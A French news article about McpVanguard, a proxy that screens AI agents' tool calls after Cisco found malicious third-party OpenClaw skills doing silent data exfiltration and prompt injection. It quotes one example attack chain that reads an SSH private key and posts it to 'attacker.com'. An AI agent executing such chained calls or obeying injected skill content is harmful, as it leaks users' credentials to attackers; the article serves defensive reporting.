Le proxy McpVanguard bloque l'exfiltration des données de compétence OpenClaw

✍️ OpenClawRadar📅 Publié: March 20, 2026🔗 Source
Le proxy McpVanguard bloque l'exfiltration des données de compétence OpenClaw
Ad

En réponse à la découverte par l'équipe de sécurité IA de Cisco de compétences tierces OpenClaw effectuant une exfiltration silencieuse de données et une injection d'invite, un développeur a publié McpVanguard, un proxy conçu pour s'interposer entre un agent d'IA et ses outils afin de bloquer les appels malveillants avant leur exécution.

Le problème : les appels malveillants en chaîne

Le problème de sécurité n'est pas un bogue dans OpenClaw lui-même, mais une conséquence du fait que les agents ont un accès au système de fichiers, une exécution de shell et des appels réseau sans limites d'application. Les tests de Cisco ont révélé un schéma où des appels individuels apparemment inoffensifs se combinent pour créer une violation, comme :

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

Aucun appel ne semble malveillant isolément, mais ensemble, ils exfiltrent des données sensibles. Selon la source, ClawHub comptait plus de 820 compétences malveillantes à son apogée, et CVE-2026-25253 permettait aux attaquants d'obtenir une exécution de code à distance via un seul lien malveillant. La validation actuelle au niveau des compétences ne parvient pas à détecter ces séquences d'appels en chaîne.

Ad

La solution : le proxy McpVanguard

McpVanguard aborde ce problème en interceptant les appels entre l'agent et ses outils. Il utilise trois méthodes de détection :

  • Correspondance de motifs
  • Évaluation de l'intention sémantique
  • Détection des chaînes comportementales sur l'ensemble de la session

L'installation se fait via pip : pip install mcp-vanguard.

Couche plus profonde : le protocole VEX

Le projet inclut une couche de sécurité plus profonde appelée protocole VEX, décrite comme un système « enregistreur de vol ». Il fournit :

  • Des pistes d'audit Merkle pour une journalisation résistante à la falsification
  • Une vérification d'identité de l'agent ancrée dans un TPM
  • Une application au niveau des appels système

Le protocole VEX est construit en Rust et son développement a commencé en décembre 2023, avant qu'OpenClaw ne gagne en popularité. La source note que NVIDIA a récemment livré NemoClaw pour des objectifs de sécurité similaires, indiquant que ce type de menace ne va pas disparaître.

Les deux projets sont disponibles sur GitHub :

📖 Read the full source: r/openclaw

Ad

👀 See Also

Écart de Sécurité des Agents IA : Comment Supra-Wall Ajoute une Couche d'Application Entre les Modèles et les Outils
Security

Écart de Sécurité des Agents IA : Comment Supra-Wall Ajoute une Couche d'Application Entre les Modèles et les Outils

Un développeur a découvert que son agent IA a lu de manière autonome des fichiers .env sensibles contenant des clés Stripe, des mots de passe de base de données et des clés API OpenAI. L'outil open-source Supra-Wall intercepte les appels d'outils avant leur exécution pour appliquer des politiques de sécurité.

OpenClawRadar
Nouvelle Compétence Automatise le Renforcement de la Sécurité OpenClaw sur les Serveurs Distants
Security

Nouvelle Compétence Automatise le Renforcement de la Sécurité OpenClaw sur les Serveurs Distants

Un développeur communautaire a publié une compétence qui aide les assistants IA à sécuriser automatiquement les installations OpenClaw sur les serveurs distants.

OpenClaw Radar
Passeport Agent : Vérification d'identité pour les agents IA
Security

Passeport Agent : Vérification d'identité pour les agents IA

Agent Passport est une couche de vérification d'identité open source utilisant l'authentification Ed25519 et des jetons JWT pour les agents IA, résolvant le problème de l'usurpation d'identité des agents.

OpenClawRadar
La découverte des vulnérabilités de l'IA dépasse les délais de déploiement des correctifs.
Security

La découverte des vulnérabilités de l'IA dépasse les délais de déploiement des correctifs.

Un expert en sécurité affirme que les outils d'IA comme Mythos détecteront les vulnérabilités plus rapidement que les correctifs ne pourront être déployés, citant les données Log4j montrant des délais moyens de correction de 17 jours et une élimination complète prévue sur une décennie.

OpenClawRadar